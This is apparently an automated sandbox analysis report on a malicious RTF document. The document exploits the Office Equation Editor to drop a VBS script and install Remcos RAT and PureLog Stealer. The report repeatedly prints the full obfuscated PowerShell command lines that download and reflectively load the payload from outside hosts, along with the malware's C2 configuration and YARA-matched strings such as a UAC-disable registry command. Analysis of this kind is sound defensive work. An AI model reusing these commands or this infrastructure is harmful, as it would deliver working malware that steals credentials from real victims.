Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
beNwFiUxpf.rtf

Overview

General Information

Sample name:beNwFiUxpf.rtf
renamed because original name is a hash value
Original sample name:72dd90d54b9dcfe691ff308a9cacb72f.rtf
Analysis ID:1528438
MD5:72dd90d54b9dcfe691ff308a9cacb72f
SHA1:79997f6339815718fdd17e5e4c47a6ea08a5549f
SHA256:7a8ccad40f6f34469ac64889b09cf44c53d2bb58dbb5e900abcc9703fa62ccb4
Tags:rtf
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3236 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3316 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3476 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 3924 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
beNwFiUxpf.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc19:$obj2: \objdata
  • 0xbff:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4a8:$a1: Remcos restarted by watchdog!
          • 0x6ca20:$a3: %02i:%02i:%02i:%03i
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          9.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            9.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              9.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6aaa8:$a1: Remcos restarted by watchdog!
              • 0x6b020:$a3: %02i:%02i:%02i:%03i
              9.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x64b6c:$str_b2: Executing file:
              • 0x65bec:$str_b3: GetDirectListeningPort
              • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x65718:$str_b7: \update.vbs
              • 0x64b94:$str_b9: Downloaded file:
              • 0x64b80:$str_b10: Downloading file:
              • 0x64c24:$str_b12: Failed to upload file:
              • 0x65bb4:$str_b13: StartForward
              • 0x65bd4:$str_b14: StopForward
              • 0x65670:$str_b15: fso.DeleteFile "
              • 0x65604:$str_b16: On Error Resume Next
              • 0x656a0:$str_b17: fso.DeleteFolder "
              • 0x64c14:$str_b18: Uploaded file:
              • 0x64bd4:$str_b19: Unable to delete:
              • 0x65638:$str_b20: while fso.FileExists("
              • 0x650b1:$str_c0: [Firefox StoredLogins not found]
              9.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6497c:$s1: CoGetObject
              • 0x64990:$s1: CoGetObject
              • 0x649ac:$s1: CoGetObject
              • 0x6e938:$s1: CoGetObject
              • 0x6493c:$s2: Elevation:Administrator!new:
              Click to see the 18 entries

              Exploits

              barindex
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.175.242.80, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3316, TargetFilename: C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydw
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 107.175.242.80, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoT
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 